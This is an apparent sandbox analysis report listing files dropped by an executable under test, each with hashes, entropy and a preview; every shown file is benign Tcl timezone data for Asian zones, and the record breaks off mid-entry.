                                                                                                                                                                                                                              SHA-256:389C9D3EE2970665D0D8C5CB61B8B790C5FBDDC0DF0BF2B9753046F5953A477F
                                                                                                                                                                                                                              SHA-512:C2D6BB4FEB5848D0704647D26F94C0BD8CD7E834AA2187EC9C877E80157E9CC225BBA3BECEE0148894C8639105D292AB50EE95830992BF357C632ACF001E020F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Taipei) {.. {-9223372036854775808 29160 0 LMT}.. {-2335248360 28800 0 CST}.. {-1017820800 32400 0 JST}.. {-766224000 28800 0 CST}.. {-745833600 32400 1 CDT}.. {-733827600 28800 0 CST}.. {-716889600 32400 1 CDT}.. {-699613200 28800 0 CST}.. {-683884800 32400 1 CDT}.. {-670669200 28800 0 CST}.. {-652348800 32400 1 CDT}.. {-639133200 28800 0 CST}.. {-620812800 32400 1 CDT}.. {-607597200 28800 0 CST}.. {-589276800 32400 1 CDT}.. {-576061200 28800 0 CST}.. {-562924800 32400 1 CDT}.. {-541760400 28800 0 CST}.. {-528710400 32400 1 CDT}.. {-510224400 28800 0 CST}.. {-497174400 32400 1 CDT}.. {-478688400 28800 0 CST}.. {-465638400 32400 1 CDT}.. {-449830800 28800 0 CST}.. {-434016000 32400 1 CDT}.. {-418208400 28800 0 CST}.. {-402480000 32400 1 CDT}.. {-386672400 28800 0 CST}.. {-370944000 32400 1 CDT}.. {-355136400 28800 0 CST}.. {-3394080
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):878
                                                                                                                                                                                                                              Entropy (8bit):3.9280321712564845
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5geQqdNRvOt81FCuLqecDngO6jPvTpYy5T4TXvKT10Sv6r:5+EvdJqxiF0rvK50Sv6r
                                                                                                                                                                                                                              MD5:DB59DB8E401E12917B7367D5604D3DE6
                                                                                                                                                                                                                              SHA1:7CC7C5C1DB551BD381B833C81746201D36BC59A9
                                                                                                                                                                                                                              SHA-256:4445F3F892C7267A6867009CC1A3F0B0548D0240408375A9D15360B28993C2A9
                                                                                                                                                                                                                              SHA-512:2C7AE63C408A9F06F973AAC16845E1DBE92D15A421BBBE420914F21155AD5E57CD058D7E4427E43185E023D2FF475EBF9D74003ECEF004FF4E5F9D5681ADFB80
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Tashkent) {.. {-9223372036854775808 16631 0 LMT}.. {-1441168631 18000 0 +05}.. {-1247547600 21600 0 +06}.. {354909600 25200 1 +06}.. {370717200 21600 0 +06}.. {386445600 25200 1 +06}.. {402253200 21600 0 +06}.. {417981600 25200 1 +06}.. {433789200 21600 0 +06}.. {449604000 25200 1 +06}.. {465336000 21600 0 +06}.. {481060800 25200 1 +06}.. {496785600 21600 0 +06}.. {512510400 25200 1 +06}.. {528235200 21600 0 +06}.. {543960000 25200 1 +06}.. {559684800 21600 0 +06}.. {575409600 25200 1 +06}.. {591134400 21600 0 +06}.. {606859200 25200 1 +06}.. {622584000 21600 0 +06}.. {638308800 25200 1 +06}.. {654638400 21600 0 +06}.. {670363200 18000 0 +05}.. {670366800 21600 1 +05}.. {686091600 18000 0 +05}.. {694206000 18000 0 +05}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1729
                                                                                                                                                                                                                              Entropy (8bit):3.6815162494646034
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5yBeqvIdZlykbocXcwJUE5iu8JmFebARoc9lVNk7/9bq8dq16b3C9UPqUsx9Ul4N:5MmsUf8mFpNWFnytO6VnYK
                                                                                                                                                                                                                              MD5:C376C9ED66F6CC011E063D3E8E0DCED1
                                                                                                                                                                                                                              SHA1:13C6345F8CB0EC79FE7C78B156C5737BCB66E49E
                                                                                                                                                                                                                              SHA-256:B637BB0E49144C717E99E93540CB2C4D3695D63B91FE42547F2F0AA006498693
                                                                                                                                                                                                                              SHA-512:FD60192CBEDC91C5D6B3B5E6F19DEDCAE14DCF48DCAE6D4865A8F0BBDC01CBF8DAAE92C4C46C353AF5B3EEE36CCC87B23F193DDF221132F5404C42507B708364
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Tbilisi) {.. {-9223372036854775808 10751 0 LMT}.. {-2840151551 10751 0 TBMT}.. {-1441162751 10800 0 +03}.. {-405140400 14400 0 +04}.. {354916800 18000 1 +04}.. {370724400 14400 0 +04}.. {386452800 18000 1 +04}.. {402260400 14400 0 +04}.. {417988800 18000 1 +04}.. {433796400 14400 0 +04}.. {449611200 18000 1 +04}.. {465343200 14400 0 +04}.. {481068000 18000 1 +04}.. {496792800 14400 0 +04}.. {512517600 18000 1 +04}.. {528242400 14400 0 +04}.. {543967200 18000 1 +04}.. {559692000 14400 0 +04}.. {575416800 18000 1 +04}.. {591141600 14400 0 +04}.. {606866400 18000 1 +04}.. {622591200 14400 0 +04}.. {638316000 18000 1 +04}.. {654645600 14400 0 +04}.. {670370400 10800 0 +03}.. {670374000 14400 1 +03}.. {686098800 10800 0 +03}.. {694213200 10800 0 +03}.. {701816400 14400 1 +03}.. {717537600 10800 0 +03}.. {733266000 14400 1 +03}.. {748
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2354
                                                                                                                                                                                                                              Entropy (8bit):3.666553647637418
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5Z2eendFalxbr1p4USUcESUUxSuEqzSUUongA3jJW3eY37U8uuZrc3cNWH1/ANzx:54G9SOSWzx1qcK83kv3OR0xV1ox
                                                                                                                                                                                                                              MD5:A7A174A14E51E0ACD7092D2A5AA50F99
                                                                                                                                                                                                                              SHA1:69ADDDDB68084B90819AD49A5230D5B0E1A9CD85
                                                                                                                                                                                                                              SHA-256:25870503A8A679DA13B98117BD473EAA0C79B094B85D3AD50629FF0946D5EACE
                                                                                                                                                                                                                              SHA-512:1ECFB558B13C94BDC848E7BBBB0CA1BB854BB12E112EBF306045EC14F00CE3E3C2DA51EBA8AF2D63C95D71B945647C3D9E9881158FE128DEBE940A742C4BFEB1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Tehran) {.. {-9223372036854775808 12344 0 LMT}.. {-1704165944 12344 0 TMT}.. {-1090466744 12600 0 +0330}.. {227820600 16200 1 +0330}.. {246227400 14400 0 +04}.. {259617600 18000 1 +04}.. {271108800 14400 0 +04}.. {283982400 12600 0 +0330}.. {296598600 16200 1 +0330}.. {306531000 12600 0 +0330}.. {322432200 16200 1 +0330}.. {338499000 12600 0 +0330}.. {673216200 16200 1 +0330}.. {685481400 12600 0 +0330}.. {701209800 16200 1 +0330}.. {717103800 12600 0 +0330}.. {732745800 16200 1 +0330}.. {748639800 12600 0 +0330}.. {764281800 16200 1 +0330}.. {780175800 12600 0 +0330}.. {795817800 16200 1 +0330}.. {811711800 12600 0 +0330}.. {827353800 16200 1 +0330}.. {843247800 12600 0 +0330}.. {858976200 16200 1 +0330}.. {874870200 12600 0 +0330}.. {890512200 16200 1 +0330}.. {906406200 12600 0 +0330}.. {922048200 16200 1 +0330}.. {937942200 12600
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):184
                                                                                                                                                                                                                              Entropy (8bit):4.876713308636272
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq85zFFfXHAIgN0AzFFVHRL/2WFK+TT52WFKYzFgn:SlSWB9vsM3yZbPHAIgCAXRN/2wKsswKR
                                                                                                                                                                                                                              MD5:40B15013485EE2138A3DCB915F9121E7
                                                                                                                                                                                                                              SHA1:3ADBE38686C7CA1FDE3DDD12BE908F39BFD1E228
                                                                                                                                                                                                                              SHA-256:07537A30E6236D9E334DAFD5C4D352D25FDEF95D6DC7496F5D93EFAB74D9EBB1
                                                                                                                                                                                                                              SHA-512:DA3B7B44B3BEF07CA8AA5253BF684A838181D8A15D7CCF0447A6B5F5BAE28D155CF65BCFB6286EB36C0B9F4FDD1FE862A3297ADB6FC33532B9F766334283D725
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Jerusalem)]} {.. LoadTimeZoneFile Asia/Jerusalem..}..set TZData(:Asia/Tel_Aviv) $TZData(:Asia/Jerusalem)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):176
                                                                                                                                                                                                                              Entropy (8bit):4.906503135441824
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8kNZ4WXHAIgNqFNKARL/2WFK9Z752WFKvNZovn:SlSWB9vsM3ykZ42HAIgc3KAN/2wKf126
                                                                                                                                                                                                                              MD5:081862B6FB33389BEC9B0E6B500AA342
                                                                                                                                                                                                                              SHA1:AF9467BB87C4C28921DF62A87B81223052F9FF4A
                                                                                                                                                                                                                              SHA-256:37459C17B59639DF62B3F3943751902CE6AAF1F11B7630069DB45052EBEFB5B9
                                                                                                                                                                                                                              SHA-512:CAF6F1C928528C4471229A2EF2944623545626532986628E6CE38884535286A0B38BA88C1A295E8B11322475D6BFAC61BF89786A76330C1A0C729339A3532BAF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Thimphu)]} {.. LoadTimeZoneFile Asia/Thimphu..}..set TZData(:Asia/Thimbu) $TZData(:Asia/Thimphu)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):180
                                                                                                                                                                                                                              Entropy (8bit):4.887493603495978
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2WFKvNZJMXGm2OHEQUTFnoHqVaJKuc/v6Q61V9gmZVFSTVV:SlSWB9eg/2wKVZJDm2OHEfnoHDKuc/SC
                                                                                                                                                                                                                              MD5:F239452984CCA9F23E97A880652C39E6
                                                                                                                                                                                                                              SHA1:52D25282D03B79960F152D21E7492EE26DAEBBAA
                                                                                                                                                                                                                              SHA-256:B797C74E3840298C3CD8149FC8AA4BCE839EFE79E7C3310986FF23C965607929
                                                                                                                                                                                                                              SHA-512:1044BEDAE04FCA7BD62937AFCE70F6C447583A90DD1596C3029A64A8251E3F73C106F4D940548DD38E895D67FEFDCD196B257E11437DEB399085EE80C345AA50
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Thimphu) {.. {-9223372036854775808 21516 0 LMT}.. {-706341516 19800 0 +0530}.. {560025000 21600 0 +06}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):388
                                                                                                                                                                                                                              Entropy (8bit):4.470556147950505
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862ymdHOx5CvAoK3zoiIxtoFDIe+zT0agbov:5yeOCvARzzCOVa/gby
                                                                                                                                                                                                                              MD5:3CCC15B63A882DB1B7459A51CD1C8165
                                                                                                                                                                                                                              SHA1:77A3EFE6E4EE524B9EC6F51593DD7521FD7B8DAD
                                                                                                                                                                                                                              SHA-256:3DA522FA88541A375D53F30A0B62DC4A305FA0315FEE534B7998C9E0A239450A
                                                                                                                                                                                                                              SHA-512:15238E96DABAB5D2B9FFD25B3F50417ED32205FA69239D6F6B28DA97A378D669FD409164964D0DD2A5B1D795C8F60E8D4EB15924046348C3D6010646A536E07C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Tokyo) {.. {-9223372036854775808 33539 0 LMT}.. {-2587712400 32400 0 JST}.. {-683802000 36000 1 JDT}.. {-672310800 32400 0 JST}.. {-654771600 36000 1 JDT}.. {-640861200 32400 0 JST}.. {-620298000 36000 1 JDT}.. {-609411600 32400 0 JST}.. {-588848400 36000 1 JDT}.. {-577962000 32400 0 JST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2116
                                                                                                                                                                                                                              Entropy (8bit):3.695316005718174
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5CeLz/XJfsFN/3sFrOksF/sF7IyksF7FRZsFLsFTsFcsFk73sFK/XCFKTipnFEno:5H040yVRB7VfXucydm4IqtTTDOS
                                                                                                                                                                                                                              MD5:E95DE93CBCE72C5E02D7ECFE94C96308
                                                                                                                                                                                                                              SHA1:59A49EBFE544D97545BADFEFE716BB5659C64C20
                                                                                                                                                                                                                              SHA-256:6B64A01D0F0B5EC7A1410C3BD6883BA7CC133E9F073D40E8BFECE037E3A3FA24
                                                                                                                                                                                                                              SHA-512:9E33DC9C1C6D60F3226263C484AF46A14AAB31F838516A0D69BA08F8F416EF10D09697E8D7ABAC1CE1F5BCE8AB0C2635D99FBE70C89ECC268DED0DCE89E67466
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Tomsk) {.. {-9223372036854775808 20391 0 LMT}.. {-1578807591 21600 0 +06}.. {-1247551200 25200 0 +08}.. {354906000 28800 1 +08}.. {370713600 25200 0 +07}.. {386442000 28800 1 +08}.. {402249600 25200 0 +07}.. {417978000 28800 1 +08}.. {433785600 25200 0 +07}.. {449600400 28800 1 +08}.. {465332400 25200 0 +07}.. {481057200 28800 1 +08}.. {496782000 25200 0 +07}.. {512506800 28800 1 +08}.. {528231600 25200 0 +07}.. {543956400 28800 1 +08}.. {559681200 25200 0 +07}.. {575406000 28800 1 +08}.. {591130800 25200 0 +07}.. {606855600 28800 1 +08}.. {622580400 25200 0 +07}.. {638305200 28800 1 +08}.. {654634800 25200 0 +07}.. {670359600 21600 0 +07}.. {670363200 25200 1 +07}.. {686088000 21600 0 +06}.. {695764800 25200 0 +08}.. {701809200 28800 1 +08}.. {717534000 25200 0 +07}.. {733258800 28800 1 +08}.. {748983600 25200 0 +07}.. {7647084
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):186
                                                                                                                                                                                                                              Entropy (8bit):4.897140749162557
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8pYFfXHAIgNzGRRL/2WFKPQOrFJ4WFKov:SlSWB9vsM3yWFPHAIg0RN/2wKPQOrFJD
                                                                                                                                                                                                                              MD5:F6AE33D706C36FDD8A21F44AD59F5607
                                                                                                                                                                                                                              SHA1:94D6EC7A437249AEBE2FA4AF8AFB029A620368C0
                                                                                                                                                                                                                              SHA-256:732751845ACEDBFFD3C6170F4B94CB20B25BFDCFCC5EEA19F4BE439F5C5B573A
                                                                                                                                                                                                                              SHA-512:2314AB2B154887842211C9A570BC1323D9B4375FF60C96296835DB001E8A277CA62D40B8562BC34EDDF281D96D5325640B79F7907558C6E0319C7D2A76BE239C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Makassar)]} {.. LoadTimeZoneFile Asia/Makassar..}..set TZData(:Asia/Ujung_Pandang) $TZData(:Asia/Makassar)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1590
                                                                                                                                                                                                                              Entropy (8bit):3.7728141273024374
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5IerIvusF7cCGK6zoCjZte3kzMjsBw0oZzlL98oysHqGzJvqE+ksabzdX+YjL:5VujmUCei46oljFC67
                                                                                                                                                                                                                              MD5:A4647294401D2B54ABAA8E509BF05A6F
                                                                                                                                                                                                                              SHA1:BF804CC38996D7715E3BA9BAD715D7ADBED781B9
                                                                                                                                                                                                                              SHA-256:A56A26981163A717CF388A423CFE7A2BAD1BE8652BE2E338670CBC0C0A70E5E9
                                                                                                                                                                                                                              SHA-512:B43157FABDE016FA6636CAB7B06CC1DEA53526B42FB46BB41DC4B7E48188D191C325BEF0D170B125E885F321C4316746A8D478D798828E2DC4A51C71DA4A610C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Ulaanbaatar) {.. {-9223372036854775808 25652 0 LMT}.. {-2032931252 25200 0 +07}.. {252435600 28800 0 +08}.. {417974400 32400 1 +08}.. {433782000 28800 0 +08}.. {449596800 32400 1 +08}.. {465318000 28800 0 +08}.. {481046400 32400 1 +08}.. {496767600 28800 0 +08}.. {512496000 32400 1 +08}.. {528217200 28800 0 +08}.. {543945600 32400 1 +08}.. {559666800 28800 0 +08}.. {575395200 32400 1 +08}.. {591116400 28800 0 +08}.. {606844800 32400 1 +08}.. {622566000 28800 0 +08}.. {638294400 32400 1 +08}.. {654620400 28800 0 +08}.. {670348800 32400 1 +08}.. {686070000 28800 0 +08}.. {701798400 32400 1 +08}.. {717519600 28800 0 +08}.. {733248000 32400 1 +08}.. {748969200 28800 0 +08}.. {764697600 32400 1 +08}.. {780418800 28800 0 +08}.. {796147200 32400 1 +08}.. {811868400 28800 0 +08}.. {828201600 32400 1 +08}.. {843922800 28800 0 +08}.. {859
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):192
                                                                                                                                                                                                                              Entropy (8bit):4.728285544456033
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8TcXkXHAIgNrfcXORL/2WFKhrMEBQWFKucXB:SlSWB9vsM3yXHAIgTN/2wKhrMEewKX
                                                                                                                                                                                                                              MD5:D2EAEA6182FB332CAA707B523F6C8A9D
                                                                                                                                                                                                                              SHA1:3BFC654E2B3BCF902AF41AEEC46772C84FFF3890
                                                                                                                                                                                                                              SHA-256:D17FDAF17B3DAC3A1310E2332F61585598185E64CED799ABD68249EB5B698591
                                                                                                                                                                                                                              SHA-512:E16BEE28BFE3AFFFE6F0025C09D0D65001F38D5045AAB1B554E4D3A66A88273F985B7BAA11F8D26E76E5ABC9F559E3E4B794CC939AAD5FF012A5A47924D08CB3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Ulaanbaatar)]} {.. LoadTimeZoneFile Asia/Ulaanbaatar..}..set TZData(:Asia/Ulan_Bator) $TZData(:Asia/Ulaanbaatar)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):149
                                                                                                                                                                                                                              Entropy (8bit):5.006390440264841
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2WFKjhfMXGm2OHEVPoHsWA0GVFSTVVn:SlSWB9eg/2wKjJDm2OHEVPoH3A0CUX
                                                                                                                                                                                                                              MD5:D6245CAAEC9BA2579F4CEFFF196A9369
                                                                                                                                                                                                                              SHA1:4D182953F2CEEFF3583265F977B14F40C1A2FB43
                                                                                                                                                                                                                              SHA-256:C445B8030DEDDDED0AFF5CC692CC323B63BE8C14BBD42DC3FDE90AD4F9D14785
                                                                                                                                                                                                                              SHA-512:A32C477B6FAA79247907D1C4E2DF400B05AF4B529277C4CE12B33097872311E3F579115DC8CBA93DAC936928FD574414F3473A9CB7C8E85AB57CCA57489B60F8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Urumqi) {.. {-9223372036854775808 21020 0 LMT}.. {-1325483420 21600 0 +06}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2058
                                                                                                                                                                                                                              Entropy (8bit):3.773734429231407
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5petrlfgLv+OC+jsuwltZQONEa2Ggf3augO8UoxLyHdX/CX6bW4Bv/7NKxKG:5Ysv+0j6lua2Gg/3gO8UoOZU2Wc/pKF
                                                                                                                                                                                                                              MD5:5ADD78E4AFCBA913D078A8790861A2DE
                                                                                                                                                                                                                              SHA1:BB63A762D5D76C0FD3CB9AB2BCDE95718E1C99EB
                                                                                                                                                                                                                              SHA-256:9D639C0FC69B3BEEBC96969092F9590EB48E7946E901B225BF245E165973B9A8
                                                                                                                                                                                                                              SHA-512:7C2418FD1F96F101B83E2ABDF2551405C6E429DBBF30A2FA7CD2477E2CE1CEEBB790C51B28AEFF043BA7A7A914CEF3C812668058D69225B9FE9475C56508453D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Ust-Nera) {.. {-9223372036854775808 34374 0 LMT}.. {-1579426374 28800 0 +08}.. {354898800 43200 0 +12}.. {370699200 39600 0 +11}.. {386427600 43200 1 +12}.. {402235200 39600 0 +11}.. {417963600 43200 1 +12}.. {433771200 39600 0 +11}.. {449586000 43200 1 +12}.. {465318000 39600 0 +11}.. {481042800 43200 1 +12}.. {496767600 39600 0 +11}.. {512492400 43200 1 +12}.. {528217200 39600 0 +11}.. {543942000 43200 1 +12}.. {559666800 39600 0 +11}.. {575391600 43200 1 +12}.. {591116400 39600 0 +11}.. {606841200 43200 1 +12}.. {622566000 39600 0 +11}.. {638290800 43200 1 +12}.. {654620400 39600 0 +11}.. {670345200 36000 0 +11}.. {670348800 39600 1 +11}.. {686073600 36000 0 +10}.. {695750400 39600 0 +12}.. {701794800 43200 1 +12}.. {717519600 39600 0 +11}.. {733244400 43200 1 +12}.. {748969200 39600 0 +11}.. {764694000 43200 1 +12}.. {780418
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):179
                                                                                                                                                                                                                              Entropy (8bit):4.858039387006872
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8VLYO5YFfXHAIgN8ELYOJARL/2WFKgTjEHp4WFKELt:SlSWB9vsM3y1LePHAIgKELtAN/2wKgsX
                                                                                                                                                                                                                              MD5:D23A09C84A5368FBB47174BC0A460D14
                                                                                                                                                                                                                              SHA1:045A72FEA79C75E5F0029BD110E33A022C57DFAB
                                                                                                                                                                                                                              SHA-256:18F5E4FE8247F676278AC5F1912AC401DC48DF5B756D22E76FF1CFA702F88DA7
                                                                                                                                                                                                                              SHA-512:404EABC2FC162E18C678CED063249C7FF4C28653880EA1903CE846FD191CD1C5B61E0610736F250B79BBAC768B1AFD6B9A8824D56D74591A95D7301B47D48387
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Bangkok)]} {.. LoadTimeZoneFile Asia/Bangkok..}..set TZData(:Asia/Vientiane) $TZData(:Asia/Bangkok)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2062
                                                                                                                                                                                                                              Entropy (8bit):3.7094518963173035
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:56beOUYQ7FyDy3le3i96VwAmnuBNuTw6vl9O8nfipRkwhUZDAcD:56cYQBIy343dVNUIukElcXRDhUBAcD
                                                                                                                                                                                                                              MD5:5C0C094B088D0212182E7B944197D4FE
                                                                                                                                                                                                                              SHA1:CF43A511FE9CD295207DF350704462E09D4D5278
                                                                                                                                                                                                                              SHA-256:2558C96E25359C72F168DAC6FB3C16C54F8FD7D0724EEB1671156D4A1F42AC6C
                                                                                                                                                                                                                              SHA-512:5D659EBDC8C2B06C964B083ECC78B4370A4658590D83F020CD23910C44E2D8DAFE69F61E8EB569E1905E89F38CD03ABE6B92F6CE36CF0B1EE0732A7645AFA65D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Vladivostok) {.. {-9223372036854775808 31651 0 LMT}.. {-1487321251 32400 0 +09}.. {-1247562000 36000 0 +11}.. {354895200 39600 1 +11}.. {370702800 36000 0 +10}.. {386431200 39600 1 +11}.. {402238800 36000 0 +10}.. {417967200 39600 1 +11}.. {433774800 36000 0 +10}.. {449589600 39600 1 +11}.. {465321600 36000 0 +10}.. {481046400 39600 1 +11}.. {496771200 36000 0 +10}.. {512496000 39600 1 +11}.. {528220800 36000 0 +10}.. {543945600 39600 1 +11}.. {559670400 36000 0 +10}.. {575395200 39600 1 +11}.. {591120000 36000 0 +10}.. {606844800 39600 1 +11}.. {622569600 36000 0 +10}.. {638294400 39600 1 +11}.. {654624000 36000 0 +10}.. {670348800 32400 0 +10}.. {670352400 36000 1 +10}.. {686077200 32400 0 +09}.. {695754000 36000 0 +11}.. {701798400 39600 1 +11}.. {717523200 36000 0 +10}.. {733248000 39600 1 +11}.. {748972800 36000 0 +10}.. {7
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2058
                                                                                                                                                                                                                              Entropy (8bit):3.7081033128260934
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5h+r1gIgWH/lt0irzEzCSCItWiIrW+rDQk9CVhyFY7rRWjYuhUmgr2j:K5PhtjLiII2ZFlgm
                                                                                                                                                                                                                              MD5:E43E5F0EA7C4575525BAB130984DCDCC
